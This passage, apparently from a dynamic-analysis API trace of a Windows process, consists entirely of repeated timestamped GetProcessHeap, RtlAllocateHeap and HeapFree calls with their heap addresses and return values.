Size=0x88) returned 0x6825f08 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.995] GetProcessHeap () returned 0xe30000 [0140.995] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.996] GetProcessHeap () returned 0xe30000 [0140.996] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.997] GetProcessHeap () returned 0xe30000 [0140.997] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.997] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.998] GetProcessHeap () returned 0xe30000 [0140.998] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0140.998] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0140.999] GetProcessHeap () returned 0xe30000 [0140.999] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0140.999] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0141.000] GetProcessHeap () returned 0xe30000 [0141.000] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.001] GetProcessHeap () returned 0xe30000 [0141.001] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.002] GetProcessHeap () returned 0xe30000 [0141.002] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68265c8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68265c8 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0141.003] GetProcessHeap () returned 0xe30000 [0141.003] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0141.003] GetProcessHeap () returned 0xe30000 [0141.004] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0141.004] GetProcessHeap () returned 0xe30000 [0141.004] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0141.004] GetProcessHeap () returned 0xe30000 [0141.005] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0141.005] GetProcessHeap () returned 0xe30000 [0141.005] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0141.005] 